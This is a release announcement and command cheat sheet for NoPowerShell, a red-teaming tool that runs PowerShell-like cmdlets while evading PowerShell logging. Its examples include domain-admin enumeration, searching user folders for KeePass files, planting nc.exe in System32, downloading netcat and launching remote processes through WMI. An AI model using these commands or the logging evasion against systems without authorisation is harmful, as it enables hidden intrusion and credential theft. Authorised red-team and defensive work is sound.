nopowershell v1.2 releases: PowerShell rebuilt in C# for Red Teaming purposes


NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries.

Moreover, this project makes it easy for everyone to extend its functionality using only a few lines of C# code.

Changelog v1.2

  • Cmdlets added:
    • Get-ADComputer
    • Get-RemoteSmbShare
    • Stop-Process
  • Cmdlets updated:
    • Get-SystemInfo: Stability improvements
    • Get-ChildItem: Added support for listing env: and some refactoring
    • Get-ItemProperty: Implemented -Name option
    • Get-Process: Implemented -Name option
    • Resolve-DnsName: Implemented -Type option
  • Some minor improvements
  • Updated README
  • Updated Twitter handle in all files



When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe character (|) with respectively a caret (^) or a backtick (`), i.e.:

  • cmd.exe: ls ^| select Name
  • PowerShell: ls `| select Name


List all commands supported by NoPowerShellGet-Command
Get help for a commandGet-Help -Name Get-ProcessAlternative: man ps
Show current userNoPowerShell.exe whoamiUnofficial command
List all user groups in domainGet-ADGroup -Filter *
List all administrative groups in domainGet-ADGroup -LDAPFilter “(admincount=1)” | select Name
List all properties of the Administrator domain userGet-ADUser -Identity Administrator -Properties *
List all Administrative users in domainGet-ADUser -LDAPFilter “(admincount=1)”
List all users in domainGet-ADUser -Filter *
List specific attributes of userGet-ADUser Administrator -Properties SamAccountName,ObjectSID
Show information about the current systemsysteminfoUnofficial command
List all processes containing PowerShell in the process nameGet-Process | ? Name -Like *PowerShell*
List all active local usersGet-LocalUser | ? Disabled -EQ False
List all local groupsGet-LocalGroup
List details of a specific groupGet-LocalGroup Administrators
List all active members of the Administrators groupGet-LocalGroupMember -Group Administrators | ? Disabled -eq False
List all local usersGet-LocalUser
List details of a specific user Get-LocalUser Administrator
Copy file from one location to anothercopy C:\Tmp\nc.exe C:\Windows\System32\nc.exe
Copy foldercopy C:\Tmp\MyFolder C:\Tmp\MyFolderBackup
Locate KeePass files in the C:\Users\ directoryls -Recurse -Force C:\Users\ -Include *.kdbx
List the keys under the SOFTWARE key in the registryls HKLM:\SOFTWARE
View contents of a fileGet-Content C:\Windows\WindowsUpdate.log
List autoruns in the registryGet-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run | ft
List processesGet-Process
List processes on remote hostGet-Process -ComputerName dc01.corp.local -Username Administrator -Password P4ssw0rd!
Obtain data of Win32_Process class from a remote system and apply a filter on the outputgwmi “Select ProcessId,Name,CommandLine From Win32_Process” -ComputerName dc01.corp.local | ? Name -Like *PowerShell* | select ProcessId,CommandLineExplicit credentials can be specified using the -Username and -Passwordparameters
View details about a certain serviceGet-WmiObject -Class Win32_Service -Filter “Name = ‘WinRM'”
Launch process using WMIInvoke-WmiMethod -Class Win32_Process -Name Create “cmd /c calc.exe”This can also be done on a remote system
Delete a read-only fileRemove-Item -Force C:\Tmp\MyFile.txt
Recursively delete a folderRemove-Item -Recurse C:\Tmp\MyTools\
Show all network interfacesGet-NetIPAddress -All
Show the IP routing tableGet-NetRoute
Send 2 ICMP requests to IP address with half a second of timeoutTest-NetConnection -Count 2 -Timeout 500
Perform a traceroute with a timeout of 1 second and a maximum of 20 hopsTest-NetConnection -TraceRoute -Timeout 1000 -Hops 20
List network shares on the local machine that are exposed to the networkGet-NetSmbMapping
Format output as a listGet-LocalUser | fl
Format output as a list showing only specific attributesGet-LocalUser | fl Name,Description
Format output as a tableGet-Process | ft
Format output as a table showing only specific attributesGet-Process | ft ProcessId,Name
Download file from the Internetwget compiled using .NET 2 only supports SSL up to SSLv3 (no TLS 1.1+)
Download file from the Internet specifying the destinationwget -OutFile C:\Tmp\netcat.exe
Count number of resultsGet-Process | measure
Count number of lines in filegc C:\Windows\WindowsUpdate.log | measure
Show only the Name in a file listingls C:\ | select Name
Show first 10 results of file listingls C:\Windows\System32 -Include *.exe | select -First 10 Name,Length
List all members of the “Domain Admins” groupGet-ADGroupMember “Domain Admins”
Resolve domain nameResolve-DnsName microsoft.comAlternative: host
List local sharesGet-WmiObject -Namespace ROOT\CIMV2 -Query “Select * From Win32_Share Where Name LIKE ‘%$'”Alternative: gwmi -Class Win32_Share -Filter “Name LIKE ‘%$'”
Show network interfacesGet-NetIPAddressAlternatives: ipconfig, ifconfig


Copyright (c) 2018, Arris Huijgen
All rights reserved.